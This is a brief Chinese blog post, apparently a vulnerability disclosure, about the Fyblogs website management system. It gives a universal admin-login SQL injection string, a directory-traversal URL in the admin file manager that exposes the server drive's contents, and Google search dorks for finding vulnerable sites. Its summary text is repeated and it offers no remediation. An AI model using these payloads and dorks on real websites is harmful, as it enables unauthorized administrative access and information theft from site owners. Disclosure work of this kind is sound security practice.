Fyblogs网站管理系统漏洞 没穿底裤 714文章 0评论 2020年1月1日01:56:54评论681 views字数 145阅读0分29秒阅读模式 摘要后台万能密码 'or'='or' 后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露! admin/uploadfile.asp?currentFolder=/upfiles/../ 后台万能密码 'or'='or' 后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露! admin/uploadfile.asp?currentFolder=/upfiles/../ 漏洞证明: 谷歌:inurl:type.asp?id=1 新闻中心 或者 :inurl:download_ok.asp? 点赞 https://cn-sec.com/archives/75180.html 复制链接 复制链接 左青龙 微信扫一扫 右白虎 微信扫一扫
评论